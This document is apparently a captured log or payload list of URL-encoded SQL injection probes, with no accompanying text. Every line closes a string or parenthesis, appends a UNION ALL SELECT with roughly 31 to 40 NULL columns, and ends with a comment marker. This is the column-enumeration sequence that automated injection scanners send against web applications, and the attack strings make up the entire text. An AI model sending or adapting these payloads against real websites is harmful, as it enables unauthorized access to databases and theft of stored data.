1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 